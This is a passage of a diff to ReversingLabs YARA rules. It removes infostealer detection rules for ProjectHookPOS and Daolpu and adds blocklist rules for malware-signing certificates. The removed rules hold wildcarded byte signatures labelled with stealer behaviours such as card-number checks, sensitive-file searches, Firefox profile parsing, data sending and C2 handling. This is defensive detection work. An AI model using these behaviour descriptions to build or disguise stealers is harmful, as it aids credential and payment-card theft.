-            ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 68 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 8B 57 ?? 83 C4 ?? 57 89 95 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 85 ??
-            ?? ?? ?? 8B 3D ?? ?? ?? ?? 50 FF D7 56 FF D7 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 6A ??
-            51 E8 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ??
-            ?? 83 C4 ?? 33 C0 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ?? 52 50 50 68 ?? ?? ?? ?? 50
-            50 50 66 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 6A ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ??
-            FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 68 ?? ?? ?? ?? FF D3 6A
-            ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ??
-            8B F0 83 FE ?? 75 ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? 56 FF D7 8B 4D ?? 8B 85 ?? ??
-            ?? ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $network_communication_p* ) ) and ( all of ( $handle_c2_commands_p* ) ) and ( all of ( $create_cab_file_and_upload_p* ) ) and ( $cmd_expand_payload )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Board Game Bucket Ltd" and pe.signatures [ i ] . serial == "5a:36:4c:49:57:d9:34:06:f7:63:21:c2:31:6f:42:f0" and 1661337307 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Infostealer_Projecthookpos : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_E7E7F7180666546Ce7A8Da32119F5Ce1 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects ProjectHookPOS infostealer."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "dcb96a99-c8c0-5878-a3a5-fe3cfeec43c6"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "8984ac03-2646-54a1-a6d3-4c2cc72806e7"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/infostealer/Win32.Infostealer.ProjectHookPOS.yara#L1-L98"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "b7534c9e905256aaf80f04b746a92c50689437b288f7e393ef13fde1740c4a4e"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L10898-L10916"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "940f6508208998593f309ffeeeda20ab475d427c952a14871b6e58e17d2a4c85"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Infostealer"
-		tc_detection_name = "ProjectHookPOS"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$calc_luhn = {
-            55 8B EC 83 C4 ?? 53 56 57 33 C9 89 4D ?? 89 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 55
-            68 ?? ?? ?? ?? 64 FF 30 64 89 20 C6 45 ?? ?? 33 C0 89 45 ?? 8B 45 ?? 85 C0 74 ?? 8B
-            D0 83 EA ?? 66 83 3A ?? 74 ?? 8D 45 ?? 8B 55 ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 83 E8 ??
-            8B 00 25 ?? ?? ?? ?? 79 ?? 48 83 C8 ?? 40 85 C0 0F 94 C3 8B 45 ?? 85 C0 74 ?? 8B D0
-            83 EA ?? 66 83 3A ?? 74 ?? 8D 45 ?? 8B 55 ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 83 E8 ?? 8B
-            00 8B F0 85 F6 7E ?? BF ?? ?? ?? ?? 8D 45 ?? 8B 55 ?? 0F B7 54 7A ?? E8 ?? ?? ?? ??
-            8B 45 ?? 83 CA ?? E8 ?? ?? ?? ?? 0F B6 D0 66 83 FA ?? 75 ?? C6 45 ?? ?? EB ?? 84 DB
-            74 ?? 0F B6 C0 0F B6 80 ?? ?? ?? ?? 01 45 ?? EB ?? 0F B6 C0 01 45 ?? 80 F3 ?? 47 4E
-            75 ?? 8B 45 ?? B9 ?? ?? ?? ?? 99 F7 F9 85 D2 75 ?? 80 7D ?? ?? 74 ?? 33 DB EB ?? B3
-            ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ??
-            ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 8B C3 5F 5E 5B 8B E5 5D C3
-        }
-		$track_1_reverse = {
-            55 8B EC 83 C4 ?? 53 56 33 DB 89 5D ?? 8B F1 89 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C0
-            55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8B C6 33 D2 E8 ?? ?? ?? ?? 8B 45 ?? 85 C0 74 ??
-            8B D0 83 EA ?? 66 83 3A ?? 74 ?? 8D 45 ?? 8B 55 ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 83 E8
-            ?? 8B 00 8B D8 83 FB ?? 7C ?? 8D 45 ?? 50 B9 ?? ?? ?? ?? 8B D3 8B 45 ?? E8 ?? ?? ??
-            ?? 8B 55 ?? 8B C6 E8 ?? ?? ?? ?? 4B 85 DB 75 ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ??
-            ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 5E 5B 59 59 5D C3
-        }
-		$check_validity_1 = {
-            8B D0 83 EA ?? 66 83 3A ?? 74 ?? 8D 45 ?? 8B 55 ?? E8 ?? ?? ?? ?? 66 83 38 ?? 75 ??
-            8B 45 ?? 85 C0 74 ?? 8B D0 83 EA ?? 66 83 3A ?? 74 ?? 8D 45 ?? 8B 55 ?? E8 ?? ?? ??
-            ?? 66 83 78 ?? ?? 0F 94 C0 EB ?? 33 C0 84 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 85 C0 74 ??
-            8B D0 83 EA ?? 66 83 3A ?? 74 ?? 8D 45 ?? 8B 55 ?? E8 ?? ?? ?? ?? 66 83 78 ?? ?? 0F
-            85 ?? ?? ?? ?? 8B 45 ?? 85 C0 74 ?? 8B D0 83 EA ?? 66 83 3A ?? 74 ?? 8D 45 ?? 8B 55
-            ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 66 81 78 ?? ?? ?? 73 ?? 0F B6 40 ?? 0F B6 C0 0F A3
-            06 72 ?? 33 C0 EB
-        }
-		$encode_and_send_1 = {
-            64 89 20 B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 33 C9 B2 ?? A1 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 8B F0 8D 4D ?? 8B 55 ?? 8B C7 E8 ?? ?? ?? ?? 8B 4D ?? 8D 45 ?? BA ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B C3 8B 08 FF 51 ?? 8D 45 ?? 8B 4D ?? BA ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 8B 55 ?? 8B C3 8B 08 FF 51 ?? 8D 45 ?? 8B 4D ?? BA ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8B 55 ?? 8B C3 8B 08 FF 51 ?? 8D 45 ?? 8B 4D ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ??
-            8B 55 ?? 8B C3 8B 08 FF 51 ?? 8B C6 E8 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B
-            C6 E8 ?? ?? ?? ?? 05 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? 50 8B CB BA
-            ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? 8B C6 E8
-        }
-		$form_create_1 = {
-            8D 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45
-            ?? E8 ?? ?? ?? ?? 8B D0 8D 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 6A ?? 8D 55
-            ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? E8
-            ?? ?? ?? ?? 50 8D 55 ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ??
-            50 E8 ?? ?? ?? ?? 8D 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B D0 8D 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ??
-            ?? ?? 84 C0 0F 84
-        }
-		$form_create_2 = {
-            33 C9 B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 8B C3 E8 ?? ?? ?? ?? 05 ?? ?? ?? ??
-            BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? BA ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? 8D 55 ??
-            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ??
-            ?? ?? ?? 8B D0 8D 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? 33 C9 BA ?? ?? ?? ?? E8 ?? ?? ?? ??
-            8B C3 E8
-        }
-		$form_create_3 = {
-            B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 BA ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? 33 C9
-            BA ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? 8D 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ??
-            BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B D0 8D 45 ?? E8 ?? ?? ?? ??
-            8B 4D ?? BA ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? 33 C9 BA ?? ?? ??
-            ?? 8B C3 E8 ?? ?? ?? ?? 33 C9 BA ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? 8B C3 E8 ?? ?? ??
-            ?? 8B C3 E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 8B 09 B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            A3 ?? ?? ?? ?? BA ?? ?? ?? ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? A1 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? 84
-            C0 74
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $calc_luhn and $track_1_reverse and $check_validity_1 and $encode_and_send_1 and $form_create_1 and $form_create_2 and $form_create_3 )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "C\\xC3\\x94NG TY TNHH PDF SOFTWARE" and ( pe.signatures [ i ] . serial == "00:e7:e7:f7:18:06:66:54:6c:e7:a8:da:32:11:9f:5c:e1" or pe.signatures [ i ] . serial == "e7:e7:f7:18:06:66:54:6c:e7:a8:da:32:11:9f:5c:e1" ) and 1661558399 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win64_Infostealer_Daolpu : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_062B2827500C5Df35A83F661B3Af5Dd3 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Daolpu infostealer."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "bf815556-6ccf-506a-b858-5f4c18282c05"
-		date = "2024-08-26"
-		modified = "2024-08-26"
+		id = "784c58d9-9a13-5402-867e-c1b144512957"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/infostealer/Win64.Infostealer.Daolpu.yara#L1-L322"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "5ffd0427c6c8e666cfabc48426e7771595a7024548706f37a1de3538e4e2d559"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L10918-L10934"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "4edc263b08b21428b5f2f4f14f9582c0f96f79cb49fbba563c103bf8bb2037a6"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Infostealer"
-		tc_detection_name = "Daolpu"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$network_communication = {
-            48 89 5C 24 ?? 48 89 6C 24 ?? 48 89 7C 24 ?? 41 56 48 83 EC ?? 48 8B D9 49 8B E8 B9
-            ?? ?? ?? ?? 4C 8B F2 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B F8 48 85 C0 0F 84 ?? ?? ??
-            ?? 4C 8D 05 ?? ?? ?? ?? 48 89 74 24 ?? BA ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 83
-            7B ?? ?? 4C 8D 43 ?? 76 ?? 4D 8B 00 BA ?? ?? ?? ?? 48 8B CF E8 ?? ?? ?? ?? BA ?? ??
-            ?? ?? 48 8B CF 44 8D 42 ?? E8 ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 8B
-            CF E8 ?? ?? ?? ?? 45 33 C0 BA ?? ?? ?? ?? 48 8B CF E8 ?? ?? ?? ?? 48 8B CF E8 ?? ??
-            ?? ?? 48 8B C8 48 8B F0 E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8B C8 48 8B D8 E8 ??
-            ?? ?? ?? 49 83 7E ?? ?? 49 8D 56 ?? 76 ?? 48 8B 12 48 8B CB E8 ?? ?? ?? ?? 48 8B CE
-            E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8B C8 48 8B D8 E8 ?? ?? ?? ?? 48 83 7D ?? ??
-            48 8D 55 ?? 76 ?? 48 8B 12 49 C7 C0 ?? ?? ?? ?? 48 8B CB E8 ?? ?? ?? ?? 48 8B CE E8
-            ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8B C8 48 8B D8 E8 ?? ?? ?? ?? 49 C7 C0 ?? ?? ??
-            ?? 48 8D 15 ?? ?? ?? ?? 48 8B CB E8 ?? ?? ?? ?? 4C 8B C6 BA ?? ?? ?? ?? 48 8B CF E8
-            ?? ?? ?? ?? 48 8B CF E8 ?? ?? ?? ?? 8B E8 85 C0 75 ?? 48 8D 1D ?? ?? ?? ?? 48 8D 05
-            ?? ?? ?? ?? EB ?? 48 8D 15 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B CD 48
-            8B D8 E8 ?? ?? ?? ?? 48 8B D0 48 8B CB E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B
-            CE E8 ?? ?? ?? ?? 48 8B 74 24 ?? 48 8B CF E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 5C 24
-            ?? 33 C0 48 8B 6C 24 ?? 48 8B 7C 24 ?? 48 83 C4 ?? 41 5E C3
-        }
-		$find_sensitive_files_p1 = {
-            48 89 5C 24 ?? 55 56 57 41 54 41 55 41 56 41 57 48 8D AC 24 ?? ?? ?? ?? 48 81 EC ??
-            ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 33 C4 48 89 85 ?? ?? ?? ?? 4C 8B F2 48 8B F9 45 33
-            E4 4C 89 65 ?? 0F 57 C0 0F 11 45 ?? 0F 57 C9 F3 0F 7F 4D ?? 49 C7 C0 ?? ?? ?? ?? 49
-            FF C0 66 46 39 24 41 75 ?? 48 8B D7 48 8D 4D ?? E8 ?? ?? ?? ?? 90 41 B8 ?? ?? ?? ??
-            48 8D 15 ?? ?? ?? ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 48 8D 4D ?? 48 83 7D ?? ?? 48 0F 47
-            4D ?? 48 8D 55 ?? FF 15 ?? ?? ?? ?? 4C 8B F8 0F 57 C0 F3 0F 7F 45 ?? 0F 57 C9 F3 0F
-            7F 4D ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 89 60 ?? 48 89 45 ?? 48 8D 4D ?? 48 89 08
-            49 83 FF ?? 0F 84 ?? ?? ?? ?? 4C 8D 2D ?? ?? ?? ?? F6 45 ?? ?? 0F 84 ?? ?? ?? ?? 0F
-            B7 4D ?? 0F B7 45 ?? 66 83 F9 ?? 75 ?? 66 85 C0 0F 84 ?? ?? ?? ?? 66 3B C9 75 ?? 66
-            3B C1 75 ?? 66 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 4C 89 64 24 ?? 0F 57 C0 0F 11 44 24 ??
-            4C 89 65 ?? 4C 89 65 ?? 49 C7 C0 ?? ?? ?? ?? 66 0F 1F 84 00 ?? ?? 00 00 49 FF C0 66
-            42 83 3C 47 ?? 75 ?? 48 8B D7 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 90 41 B8 ?? ?? ?? ?? 48
-            8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 48 8D 45 ?? 49 C7 C0 ?? ?? ?? ?? 0F
-            1F 44 00 ?? 49 FF C0 66 42 83 3C 40 ?? 75 ?? 48 8D 55 ?? 48 8D 4C 24 ?? E8 ?? ?? ??
-            ?? 48 8D 4C 24 ?? 48 83 7D ?? ?? 48 0F 47 4C 24 ?? 49 8B D6 E8 ?? ?? ?? ?? 90 48 8D
-            4C 24 ?? E8 ?? ?? ?? ?? 4C 8B 45 ?? 49 83 F8 ?? 76 ?? 48 8B 54 24 ?? 48 8D 4C 24 ??
-            E8 ?? ?? ?? ?? 4C 89 65 ?? 48 C7 45 ?? ?? ?? ?? ?? 66 44 89 64 24 ?? 48 8B 4C 24 ??
-            4C 89 64 24 ?? E9 ?? ?? ?? ?? 4C 89 65 ?? 0F 57 C0 0F 11 45 ?? 4C 89 65 ?? 4C 89 65
-            ?? 48 8D 45 ?? 49 C7 C0 ?? ?? ?? ?? 49 FF C0 66 42 83 3C 40 ?? 75 ?? 48 8D 55 ?? 48
-        }
-		$find_sensitive_files_p2 = {
-            8D 4D ?? E8 ?? ?? ?? ?? 90 4C 8D 55 ?? 48 8B 5D ?? 48 8B 75 ?? 48 83 FE ?? 4C 0F 47
-            D3 4C 8B 5D ?? 49 83 FB ?? 72 ?? 49 8D 4B ?? 48 C7 C0 ?? ?? ?? ?? 48 3B C8 48 0F 42
-            C1 4D 8D 0C 42 4D 8B C1 4D 2B C5 66 41 83 39 ?? 75 ?? BA ?? ?? ?? ?? 49 8B C5 42 0F
-            B7 0C 00 66 3B 08 75 ?? 48 83 C0 ?? 48 83 EA ?? 75 ?? 4D 2B CA 49 D1 F9 EB ?? 4D 3B
-            CA 74 ?? 49 83 E9 ?? 49 83 E8 ?? EB ?? 49 C7 C1 ?? ?? ?? ?? 49 83 F9 ?? 0F 84 ?? ??
-            ?? ?? 49 FF C1 4C 89 64 24 ?? 0F 57 C0 0F 11 44 24 ?? 4C 89 65 ?? 4C 89 65 ?? 4D 3B
-            D9 0F 82 ?? ?? ?? ?? 4D 2B D9 49 C7 C0 ?? ?? ?? ?? 4D 3B D8 4D 0F 42 C3 48 8D 45 ??
-            48 83 FE ?? 48 0F 47 C3 4A 8D 14 48 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 90 48 8D 4C 24 ??
-            48 83 7D ?? ?? 48 0F 47 4C 24 ?? 48 8D 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ??
-            ?? ?? ?? 48 8D 4C 24 ?? 48 83 7D ?? ?? 48 0F 47 4C 24 ?? 48 8D 15 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 48 8D 4C 24 ?? 48 83 7D ?? ?? 48 0F 47 4C 24 ?? 48
-            8D 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 48 8D 4C 24 ?? 48 83 7D ??
-            ?? 48 0F 47 4C 24 ?? 48 8D 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 48
-            8D 4C 24 ?? 48 83 7D ?? ?? 48 0F 47 4C 24 ?? 48 8D 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85
-            C0 74 ?? 48 8D 4C 24 ?? 48 83 7D ?? ?? 48 0F 47 4C 24 ?? 48 8D 15 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 85 C0 74 ?? 48 8D 4C 24 ?? 48 83 7D ?? ?? 48 0F 47 4C 24 ?? 48 8D 15 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8D 4C 24 ?? 48 83 7D ?? ?? 48 0F 47 4C 24 ?? 48
-            8D 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 4C 89 64 24 ?? 0F 57 C0 0F
-            11 44 24 ?? 4C 89 64 24 ?? 4C 89 64 24 ?? 49 C7 C0 ?? ?? ?? ?? 49 FF C0 66 42 83 3C
-        }
-		$find_sensitive_files_p3 = {
-            47 ?? 75 ?? 48 8B D7 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 90 41 B8 ?? ?? ?? ?? 48 8D 15 ??
-            ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 48 8B D0 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 90 48
-            8D 55 ?? 48 83 7D ?? ?? 48 0F 47 55 ?? 4C 8B 45 ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 48
-            8B D0 48 8D 4D ?? E8 ?? ?? ?? ?? 90 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 4C 8B 44 24 ?? 49
-            83 F8 ?? 76 ?? 48 8B 54 24 ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 4C 89 64 24 ?? 48 C7 44
-            24 ?? ?? ?? ?? ?? 66 44 89 64 24 ?? 48 8B 4C 24 ?? 4C 89 64 24 ?? BA ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 90 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 4C 8B 44 24 ?? 49 83 F8 ?? 76 ?? 48 8B
-            54 24 ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 4C 89 64 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? 66
-            44 89 64 24 ?? 48 8B 4C 24 ?? 4C 89 64 24 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 49 8B 46
-            ?? 49 3B 46 ?? 74 ?? 48 8D 55 ?? 48 8B C8 E8 ?? ?? ?? ?? 49 8B 5E ?? BA ?? ?? ?? ??
-            48 8D 4D ?? E8 ?? ?? ?? ?? 49 8B 0E 48 83 C1 ?? 48 8B 01 48 85 C0 74 ?? 48 39 58 ??
-            72 ?? 77 ?? 4C 89 20 48 8B 40 ?? 48 89 01 EB ?? 48 8D 48 ?? 48 8B 01 48 85 C0 75 ??
-            48 8D 4D ?? E8 ?? ?? ?? ?? 49 83 46 ?? ?? EB ?? 4C 8D 45 ?? 48 8B D0 49 8B CE E8 ??
-            ?? ?? ?? 90 48 8D 4D ?? E8 ?? ?? ?? ?? 4C 8B 45 ?? 49 83 F8 ?? 76 ?? 48 8B 55 ?? 48
-            8D 4D ?? E8 ?? ?? ?? ?? 4C 89 65 ?? 48 C7 45 ?? ?? ?? ?? ?? 66 44 89 65 ?? 48 8B 4D
-            ?? 4C 89 65 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 4C 8B
-            45 ?? 49 83 F8 ?? 76 ?? 48 8B 54 24 ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 4C 89 65 ?? 48
-            C7 45 ?? ?? ?? ?? ?? 66 44 89 64 24 ?? 48 8B 4C 24 ?? 4C 89 64 24 ?? BA ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 90 48 8D 4D ?? E8 ?? ?? ?? ?? 4C 8B 45 ?? 49 83 F8 ?? 76 ?? 48 8B 55
-            ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 4C 89 65 ?? 48 C7 45 ?? ?? ?? ?? ?? 66 44 89 65 ?? 48
-        }
-		$parse_firefox_configuration_p1 = {
-            48 89 5C 24 ?? 48 89 74 24 ?? 48 89 7C 24 ?? 55 41 54 41 55 41 56 41 57 48 8D AC 24
-            ?? ?? ?? ?? 48 81 EC ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 33 C4 48 89 85 ?? ?? ?? ??
-            48 8B F1 48 89 4C 24 ?? 45 33 ED 44 89 6C 24 ?? 0F 57 C0 0F 11 01 0F 11 41 ?? 4C 89
-            29 4C 89 69 ?? 4C 89 69 ?? 4C 89 69 ?? 41 8D 4D ?? E8 ?? ?? ?? ?? 4C 89 68 ?? 48 89
-            06 48 89 30 C7 44 24 ?? ?? ?? ?? ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 90 48 8D 4D ?? E8 ??
-            ?? ?? ?? 84 C0 0F 84 ?? ?? ?? ?? 4C 8B 75 ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 49 2B C6
-            48 83 F8 ?? 0F 82 ?? ?? ?? ?? 4C 8D 65 ?? 48 83 7D ?? ?? 4C 0F 47 65 ?? 4C 89 6C 24
-            ?? 0F 57 C0 0F 11 44 24 ?? 0F 57 C9 F3 0F 7F 4C 24 ?? 4D 8D 7E ?? 41 8D 5D ?? 48 8D
-            7C 24 ?? 48 8D 44 24 ?? 48 89 85 ?? ?? ?? ?? 8D 4B ?? E8 ?? ?? ?? ?? 48 89 85 ?? ??
-            ?? ?? 48 8D 4C 24 ?? 48 89 08 4C 89 68 ?? 48 89 44 24 ?? 8D 4B ?? 4C 3B FB 76 ?? 49
-            8B DF 48 83 CB ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 3B D8 76 ?? 48 8B D8 EB ?? 48 3B
-            D9 48 0F 42 D9 48 8D 4B ?? E8 ?? ?? ?? ?? 48 8B F8 48 89 44 24 ?? 4C 89 7C 24 ?? 48
-            89 5C 24 ?? 4D 8B C6 49 8B D4 48 8B CF E8 ?? ?? ?? ?? 8B 05 ?? ?? ?? ?? 66 42 89 04
-            37 0F B6 05 ?? ?? ?? ?? 42 88 44 37 ?? 42 C6 04 3F ?? C7 44 24 ?? ?? ?? ?? ?? 48 8D
-            54 24 ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 90 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 4C 8B 44 24 ??
-            49 83 F8 ?? 76 ?? 49 FF C0 48 8B 54 24 ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 66 0F 6F 05
-            ?? ?? 12 00 F3 0F 7F 44 24 ?? C6 44 24 ?? ?? 48 8B 4C 24 ?? 4C 89 6C 24 ?? BA ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 48 8D 55 ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 90 0F 57 C0 0F 11 45 ??
-            0F 11 45 ?? 48 8D 55 ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 90 48 8D 4D ?? E8 ?? ?? ?? ?? 90
-        }
-		$parse_firefox_configuration_p2 = {
-            4C 89 6C 24 ?? 0F 57 C0 0F 11 44 24 ?? 4C 89 6C 24 ?? 4C 89 6C 24 ?? 48 8B 7D ?? 4C
